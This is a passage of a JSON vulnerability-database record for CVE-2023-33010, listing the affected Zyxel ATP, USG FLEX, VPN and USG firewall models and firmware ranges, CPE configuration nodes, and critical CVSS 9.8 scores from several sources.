            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "usg 60w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.73"
          },
          {
            "model": "usg flex 700",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg flex 100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "atp200",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg 60",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.73"
          },
          {
            "model": "vpn50",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "atp800",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg flex 50w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "atp200",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "usg 40w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.73"
          },
          {
            "model": "vpn100",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg flex 100",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg20-vpn",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "usg flex 200",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg flex 700",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "usg flex 200",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "vpn50",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg flex 50",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "atp100",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 200",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp800",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp200",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 50",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 500",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 100",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp700",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp100w",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp500",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-007634"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-33010"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp100_firmware:5.36:-:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp100_firmware:5.36:patch1:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp200_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp200_firmware:5.36:-:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp200_firmware:5.36:patch1:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp200:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp500_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp500_firmware:5.36:-:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp500_firmware:5.36:patch1:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp500:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp100w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp100w_firmware:5.36:patch1:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp100w_firmware:5.36:-:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp100w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp700_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp700_firmware:5.36:patch1:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp700_firmware:5.36:-:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp700:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp800_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp800_firmware:5.36:-:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp800_firmware:5.36:patch1:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp800:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_100_firmware:5.36:patch1:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_100_firmware:5.36:-:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_50_firmware:5.36:-:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_50_firmware:5.36:patch1:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_50:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_200_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_200_firmware:5.36:-:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_200_firmware:5.36:patch1:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_200:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_500_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_500_firmware:5.36:-:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_500_firmware:5.36:patch1:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_500:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_700_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_700_firmware:5.36:-:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_700_firmware:5.36:patch1:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_700:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_100w_firmware:5.36:-:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_100w_firmware:5.36:patch1:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_100w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_50w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.25",
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_50w_firmware:5.36:-:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_50w_firmware:5.36:patch1:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_50w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_20w-vpn_firmware:5.36:patch1:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_20w-vpn_firmware:5.36:-:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_20w-vpn:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn100_firmware:5.36:patch1:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn100_firmware:5.36:-:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn50_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn50_firmware:5.36:-:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn50_firmware:5.36:patch1:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn50:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn300_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn300_firmware:5.36:-:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn300_firmware:5.36:patch1:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn300:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn1000_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn1000_firmware:5.36:-:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn1000_firmware:5.36:patch1:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn1000:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg20-vpn_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg20-vpn_firmware:5.36:-:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg20-vpn_firmware:5.36:patch1:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg20-vpn:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_40_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "4.73",
                        "versionStartIncluding": "4.25",
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_40_firmware:4.73:-:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_40_firmware:4.73:patch1:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_40:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_40w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "4.73",
                        "versionStartIncluding": "4.25",
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_40w_firmware:4.73:-:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_40w_firmware:4.73:patch1:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_40w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_60w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "4.73",
                        "versionStartIncluding": "4.25",
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_60w_firmware:4.73:-:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_60w_firmware:4.73:patch1:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_60w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_60_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "4.73",
                        "versionStartIncluding": "4.25",
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_60_firmware:4.73:-:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_60_firmware:4.73:patch1:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_60:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2023-33010"
          }
        ]
      },
      "cve": "CVE-2023-33010",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 9.8,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2023-33010",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2023-33010",
                "trust": 1.8,
                "value": "CRITICAL"
              },
              {
                "author": "security@zyxel.com.tw",
                "id": "CVE-2023-33010",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202305-2093",
                "trust": 0.6,
                "value": "CRITICAL"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-007634"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-33010"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-33010"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202305-2093"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
